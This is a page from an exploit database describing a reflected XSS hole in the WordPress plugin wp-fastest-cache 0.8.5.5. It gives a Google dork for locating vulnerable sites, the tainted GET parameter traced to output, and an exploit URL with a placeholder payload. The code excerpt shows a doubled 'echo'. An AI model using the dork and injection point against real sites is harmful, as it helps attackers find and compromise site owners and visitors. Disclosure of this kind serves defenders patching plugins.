[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Fastest Cache plugin XSS Vulnerability

Author
sniper.t
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-24640
Category
web applications
Date add
01-12-2015
Platform
php
######################################################################
# Exploit Title: Wordpress plugin wp-fastest-cache  XSS Vulnerability
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
#Version:0.8.5.5
# Google dork: inurl:/wp-content/plugins/wp-fastest-cache
######################################################################
 
 The code in ./wp-fastest-cache/templates/update_error.php
 

        34: echo echo $error_message; 
        8: $error_message = strip_tags($error_message); 
            7: $error_message = str_replace(array("\"", "'"), "", $error_message); 
                6: $error_message = $_GET['error_message']; 

 
 
Exploit
http://server/wp-content/plugins/wp-fastest-cache/templates/update_error.php?error_message=/*XSS_HERE*/


#  0day.today [2024-03-29]  #